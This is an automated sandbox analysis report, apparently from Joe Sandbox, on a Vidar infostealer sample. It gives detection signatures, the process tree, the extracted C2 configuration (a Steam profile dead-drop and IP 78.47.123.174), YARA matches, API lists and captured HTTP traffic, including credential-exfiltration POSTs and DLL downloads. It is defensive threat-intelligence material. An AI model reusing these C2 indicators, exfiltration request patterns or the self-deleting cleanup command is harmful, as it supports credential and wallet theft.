Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1445903
MD5: f4fb6b518e2e550467f533124e1f80f4
SHA1: 964e735dd9410e07536e46b9f50c65fed148bcd7
SHA256: 0a456f0fee171826bb44c9c2e1d5e7b95c0862b67d9dd75a843dec035224bb74
Tags: exe
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F4FB6B518E2E550467F533124E1F80F4)
    • RegAsm.exe (PID: 5768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 4996 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2276 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth
  • 0x30116:$x5: vchost.exe
  • 0x31116:$x5: vchost.exe
00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | HiddenCobra_BANKSHOT_Gen | Detects Hidden Cobra BANKSHOT trojan | Florian Roth
  • 0x30116:$x5: vchost.exe
  • 0x31116:$x5: vchost.exe
2.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
2.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x20df0:$s1: JohnDoe
  • 0x20de8:$s2: HAL9TH
              No Sigma rule has matched
              No Snort rule has matched

              AV Detection

              Source: file.exe Avira: detected
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
              Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exe Joe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004062A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00410DAC CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_00410DAC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00406242
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,2_2_004082DE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,2_2_0040245C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6CC46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6CC46C80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6CD9A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CD9A9A0
              Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
              Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00144493 FindFirstFileExW,0_2_00144493
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

              Networking

              Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
              Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
              Source: Joe Sandbox View IP Address: 78.47.123.174
              Source: Joe Sandbox View ASN Name: AKAMAI-ASN1EU
              Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 6949 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 1025 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 114541 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 78.47.123.174 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
              Source: unknown TCP traffic detected without corresponding DNS query: 78.47.123.174
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0040514C
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:49699 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 78.47.123.174:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004112FD

              System Summary

              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B8C0 rand_s,NtQueryVirtualMemory,2_2_6CC9B8C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6CC9B910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC9B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CC9B700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC3F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6CC3F280
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 001351D0 appears 48 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC794D0 appears 90 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CC6CBE8 appears 134 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 311 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CE609D0 appears 105 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
